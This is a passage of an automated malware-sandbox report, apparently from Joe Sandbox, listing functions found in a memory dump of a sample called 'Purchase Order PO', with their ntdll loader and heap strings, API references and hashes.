                                                              Function 00FC096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00FC2DF0: LdrInitializeThunk.NTDLL ref: 00FC2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC0D74
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: a0f769cead387b0a1254890c0563b96791879448656c64a21eb8a76619d3da16
                                                              • Instruction ID: 15689586b78bf5407954d845d8204b49204d5809edd264bd9425a13fcc44b44b
                                                              • Opcode Fuzzy Hash: a0f769cead387b0a1254890c0563b96791879448656c64a21eb8a76619d3da16
                                                              • Instruction Fuzzy Hash: 39426972900719DFDB20CF24C981BAAB7F4BF04310F1445ADE999EB252DB74AA85DF60
                                                              Function 00F8A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 3d833025f5e1a27ca9f0565573d78068f76a8755cc96c11ae33d09e209fec4c1
                                                              • Instruction ID: 832ba91d4d87caf19fc5f68d9e1340c9a08196550426ea422a10a5d3fb38fcf2
                                                              • Opcode Fuzzy Hash: 3d833025f5e1a27ca9f0565573d78068f76a8755cc96c11ae33d09e209fec4c1
                                                              • Instruction Fuzzy Hash: 13C1AD71508382CFEB21EF19C540BAAB7E4FF84714F14486AF8958B251E778CA49EB53
                                                              Function 00FB8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializeProcess, xrefs: 00FB8422
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 00FB8421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FB855E
                                                              • @, xrefs: 00FB8591
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: d161cd02f1a9bf7beafdea2faaf5a302bef336fef8193138fe109770caf5b8ac
                                                              • Instruction ID: 9bb42646eaa39d9fce4110889fa7d994b5106bfb988cb0681114bfc1e7bf9776
                                                              • Opcode Fuzzy Hash: d161cd02f1a9bf7beafdea2faaf5a302bef336fef8193138fe109770caf5b8ac
                                                              • Instruction Fuzzy Hash: 8F919C71508745AFD721EA21CC41FABB7ECFF84794F44092EFA8492051EA34E945EB62
                                                              Function 00FB273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FF21D9, 00FF22B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 00FF21DE
                                                              • .Local, xrefs: 00FB28D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FF22B6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: b8039ea6ceb3a0ed827188555d0599e2162b364ecd3af1e3196770feaf3660c9
                                                              • Instruction ID: 1226be3d69d1e2ecf7f045950e234fcf58494ee87ff6e6ca7b29f6d5ae286b6e
                                                              • Opcode Fuzzy Hash: b8039ea6ceb3a0ed827188555d0599e2162b364ecd3af1e3196770feaf3660c9
                                                              • Instruction Fuzzy Hash: 95A19E35D002299BDB64DF65DC88BE9B3B1BF58324F2441EAD908AB251D7309E81EF90
                                                              Function 00FB4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FF342A
                                                              • RtlDeactivateActivationContext, xrefs: 00FF3425, 00FF3432, 00FF3451
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FF3456
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FF3437
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 086301a7d517c8911070c76f9bc81f986dda9c4bc4c13402f85b0795c4db9797
                                                              • Instruction ID: 66f673bf7c3006cb16570113fd7ca73fac2a87201049e0e3c95a7d14214e8b7e
                                                              • Opcode Fuzzy Hash: 086301a7d517c8911070c76f9bc81f986dda9c4bc4c13402f85b0795c4db9797
                                                              • Instruction Fuzzy Hash: EF616672A00B119BC722CF19C942B7AB7E5EF90B60F148119F9559B291CB34FD00EB91
                                                              Function 00F864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FE0FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FE10AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FE106B
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FE1028
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: f0c0f92bda1d6415eed5796a78fde45123e2e66f5baf66299da404ca761764e6
                                                              • Instruction ID: 29065b7cf988168f796338a4c4be85048c42129196d35961de8de613b1603829
                                                              • Opcode Fuzzy Hash: f0c0f92bda1d6415eed5796a78fde45123e2e66f5baf66299da404ca761764e6
                                                              • Instruction Fuzzy Hash: 3171E1B19043459FCB20EF14C885F977FA8EF94760F040469F9488B286D778D588EBD2
                                                              Function 00FA245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 00FEA9A2
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FEA992
                                                              • LdrpDynamicShimModule, xrefs: 00FEA998
                                                              • apphelp.dll, xrefs: 00FA2462
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 3fcb0f0d09495c2f07e8dd5536ec29a47ff69bced627530df4e868e6b246c24d
                                                              • Instruction ID: 086cc97cc66c10a5105f1231626b499ac1cd1dbab65d2dffb272bce21f74fce4
                                                              • Opcode Fuzzy Hash: 3fcb0f0d09495c2f07e8dd5536ec29a47ff69bced627530df4e868e6b246c24d
                                                              • Instruction Fuzzy Hash: 62312A72E00341EBEB30DF599841AAEB7B4FB84B14F264029F841BB255C779AD41F782
                                                              Function 00F929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 00F93264
                                                              • HEAP[%wZ]: , xrefs: 00F93255
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F9327D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: 6562bd9d2dc0cb3068d7fd81d7aa9d664f7cfa2546a2a510f7a6c246a67aeca3
                                                              • Instruction ID: a384a55945d23b5c462c7c0b2aa141af539350d08d1dbcbb8f889e0b9bc5dd76
                                                              • Opcode Fuzzy Hash: 6562bd9d2dc0cb3068d7fd81d7aa9d664f7cfa2546a2a510f7a6c246a67aeca3
                                                              • Instruction Fuzzy Hash: 8F92BC71E04249AFEF25CFA8C440BAEBBF1FF48314F188059E859AB251D735AA45EF50
                                                              Function 00F90770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: 139f8b407f81b8fbc0d6caea7f17a16f7ba5d80b7e65a20bc4fd7324478f1290
                                                              • Instruction ID: f2f082c077051125eec1fdff511d2c6ee8db5f042c75bcb86b7fdf74162a023a
                                                              • Opcode Fuzzy Hash: 139f8b407f81b8fbc0d6caea7f17a16f7ba5d80b7e65a20bc4fd7324478f1290
                                                              • Instruction Fuzzy Hash: 9EF1CC31B00A46DFEB24CF69C880B6AB7B5FF45714F208168E5569B381DB34ED81EB91
                                                              Function 00FA6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: 9268c22710b197d54e4789d2d8f79abba0761d9443bfc97cce72dd431416621f
                                                              • Instruction ID: dd7239d1f188d2a206fd6e4fbaff49c270d0ec813972d7bd45308ddb07aaffe3
                                                              • Opcode Fuzzy Hash: 9268c22710b197d54e4789d2d8f79abba0761d9443bfc97cce72dd431416621f
                                                              • Instruction Fuzzy Hash: 18C2B2B2A0C3819FDB25CF25C841BABB7E5AF89754F04892DF989C7241D734D805EB92
                                                              Function 00F7A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: 147aba2536a95c84014215819beac56c858b7e501ee9d589258c3d949f402d40
                                                              • Instruction ID: 492c0e3de28c4f2556d30ae6229318bedcc74056193d289330c35d7db6bd4c43
                                                              • Opcode Fuzzy Hash: 147aba2536a95c84014215819beac56c858b7e501ee9d589258c3d949f402d40
                                                              • Instruction Fuzzy Hash: A5A19C71D0022A9BDB31DF64CC89BEAB3B9EF44710F1541EAE908A7251DB359E84DF90
                                                              Function 00FA0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 00FEA121
                                                              • LdrpCheckModule, xrefs: 00FEA117
                                                              • Failed to allocated memory for shimmed module list, xrefs: 00FEA10F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: be31e1ba92717b78226207bf526d1bad642a96b9c8d59e83adaa1a619c131c61
                                                              • Instruction ID: 51f73519e1415aa8f4a392d9be8c85affa272b4986da1570007797f4106082ef
                                                              • Opcode Fuzzy Hash: be31e1ba92717b78226207bf526d1bad642a96b9c8d59e83adaa1a619c131c61
                                                              • Instruction Fuzzy Hash: 9671DFB1E002059FDB24DF68DD41BBEB7F4EB84724F14412DE842AB251EA39AD41EB51
                                                              Function 00F90A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 120936669d2c3b7a0628c888f8f40bcf01cab03b8e22551b4d04c6d4bc934c0f
                                                              • Instruction ID: 59e777c7993b6b09679c8b5ffd8e328410017e89ba79490caea72b837d9426f6
                                                              • Opcode Fuzzy Hash: 120936669d2c3b7a0628c888f8f40bcf01cab03b8e22551b4d04c6d4bc934c0f
                                                              • Instruction Fuzzy Hash: 8461D371600741DFEB28CF24C440B6ABBE2FF45714F24846AE599CF296DB74E841EB91
                                                              Function 00FBC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 00FF82E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 00FF82D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 00FF82DE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: 94d0241a9fa44e2ab8b5a429647dbf48768a80ad0a6154815ee5f66e78706d0a
                                                              • Instruction ID: ef60bc86a8ce6379c4a86d7ba43e4abf1dff1983411ec6fffedb411ee2a3d118
                                                              • Opcode Fuzzy Hash: 94d0241a9fa44e2ab8b5a429647dbf48768a80ad0a6154815ee5f66e78706d0a
                                                              • Instruction Fuzzy Hash: 14410371944304ABD720EB25DC45F9B77E8FF48760F10452AF984E72A1EB79D800AF92
                                                              Function 0103C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0103C1C5
                                                              • @, xrefs: 0103C1F1
                                                              • PreferredUILanguages, xrefs: 0103C212
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 1856fdae07842cd719d53b101b6f142e81cd833050187d50f66211dcef1b72e7
                                                              • Instruction ID: cc26c60e8a2a46cd15f9d44955bc8110906539e33dd6c7d364160a1db94acd31
                                                              • Opcode Fuzzy Hash: 1856fdae07842cd719d53b101b6f142e81cd833050187d50f66211dcef1b72e7
                                                              • Instruction Fuzzy Hash: 24416272A00219ABEF51DAD8CD41FEEBBFCAB84700F14416BEA49F7240D7749E449B50
                                                              Function 01014144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 1bdac2c32de439ac40ce26374b3746d56d2e7027d84df8de54ab013dc4867776
                                                              • Instruction ID: 5edfd63e8988ea07ccb7e01454b6d19a5791893951c590a8ad18db7ab9343206
                                                              • Opcode Fuzzy Hash: 1bdac2c32de439ac40ce26374b3746d56d2e7027d84df8de54ab013dc4867776
                                                              • Instruction Fuzzy Hash: C3411431A042588BEB22DBD8C840BEDBBF4FF45344F24049AE981EB7A6D7388941CB50
                                                              Function 01004755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpCheckRedirection, xrefs: 0100488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01004899
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01004888
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: 5b15a1ebd8ff0728491ef157d3cfebf5f6bedd7596149543a951dd4717f862db
                                                              • Instruction ID: bb8b1dab0871242527eb950cd1e0d9d768010accb1fa6f6c212fcfe4d2c8549b
                                                              • Opcode Fuzzy Hash: 5b15a1ebd8ff0728491ef157d3cfebf5f6bedd7596149543a951dd4717f862db
                                                              • Instruction Fuzzy Hash: BC41D432A047518FEB63DE18D840A2A7BE4FF89650F050999EFC9D7291D331D900CB95
                                                              Function 00F90BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: b539d858bf4b4a94de7a7e175f9ff5fc8c6a70eae5acec8bbce5adc2d439b60b
                                                              • Instruction ID: d0cac558f3a327d4ef140c274478fed32e13b56ca79fff86f16c0d768d2ed803
                                                              • Opcode Fuzzy Hash: b539d858bf4b4a94de7a7e175f9ff5fc8c6a70eae5acec8bbce5adc2d439b60b
                                                              • Instruction Fuzzy Hash: 38110631315981DFEB28DA15C861B75B3A4EF80B2AF24811AF50ACB291DB34DC84F751
                                                              Function 010020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 010020FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01002104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 010020F3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: d3628c850ce23804fa28cc0c853e1b07e53919dbe9097dabc3a3446777f45471
                                                              • Instruction ID: db5cba32affeaeb4eef5154f852c353db868e03b1cbfcae4b47e19571e95711d
                                                              • Opcode Fuzzy Hash: d3628c850ce23804fa28cc0c853e1b07e53919dbe9097dabc3a3446777f45471
                                                              • Instruction Fuzzy Hash: 9DF0A435A40208ABF725E64C9C57FD577A8FB40B54F540065F7807B2C6D2B4A550EA92
                                                              Function 00F903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: d90863a80e27dcfb16040e8fea5712107627f7fc8bafdae77c79a20f997eae4d
                                                              • Instruction ID: 57f02e40d55ceaa59b409971f35511bdeb3d323480a33eb2948a28b87ba0d55d
                                                              • Opcode Fuzzy Hash: d90863a80e27dcfb16040e8fea5712107627f7fc8bafdae77c79a20f997eae4d
                                                              • Instruction Fuzzy Hash: AC715C71E0014A9FDF01DFA9C991FAEB7F8AF48744F144069E905E7251EA38EE01DBA0
                                                              Function 00F8A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 00F8AA13
                                                              • LdrResSearchResource Exit, xrefs: 00F8AA25
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: 1b42330faded48d4c029761319f9357b4694f533bde57435fb353b2eca2f72fe
                                                              • Instruction ID: 631167301d0a6a8c5e68185ae0cdf384f94710fbd866895c1cd5cd8f02ab6986
                                                              • Opcode Fuzzy Hash: 1b42330faded48d4c029761319f9357b4694f533bde57435fb353b2eca2f72fe
                                                              • Instruction Fuzzy Hash: BDE18F72E00259DFEB25EE99C984BEEB7B9EF54324F10402AE901E7250E738DD40EB51
                                                              Function 0104A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: 8013cb0e65be14baeaa12bb6bc2e6bb9ecb4a326b710f40e5f2261f635bc46ce
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 02C1AEB13443429BEB25CE28C881B6BBBE5AFC8314F084A3DF6D68B291D775D505CB91
                                                              Function 00FFE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 01596b8895191c87c32cef3d37fffe286099462bb591939814c2386d3860bafd
                                                              • Instruction ID: a4186e28df77fbb695402c90f4456848eb332bd930a044528dcc670789aeac77
                                                              • Opcode Fuzzy Hash: 01596b8895191c87c32cef3d37fffe286099462bb591939814c2386d3860bafd
                                                              • Instruction Fuzzy Hash: E6613D72E402189FDB24EFA88941BBDBBB5FF44740F14406DE659EB2A1D731A900EB50
                                                              Function 010243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: 0d6e8333c08de15a24506ddf5ecc08cb0374fb47723c74bd414e0cf3553a1bd4
                                                              • Instruction ID: 50655bd81fca8b6794946dec7e75ba0e9b88847bbcf52df4eca1cf3cb946f80c
                                                              • Opcode Fuzzy Hash: 0d6e8333c08de15a24506ddf5ecc08cb0374fb47723c74bd414e0cf3553a1bd4
                                                              • Instruction Fuzzy Hash: E35138B1E0062DAEDB11DFA8CC81EEEBBBCEB44754F100129E641E7281DB359A05CB60
                                                              Function 00F804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F8063D
                                                              • kLsE, xrefs: 00F80540
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: dc1dcdcf96e3a64b81dcec669dfbbb33029349fde50678894b0035709e2e7382
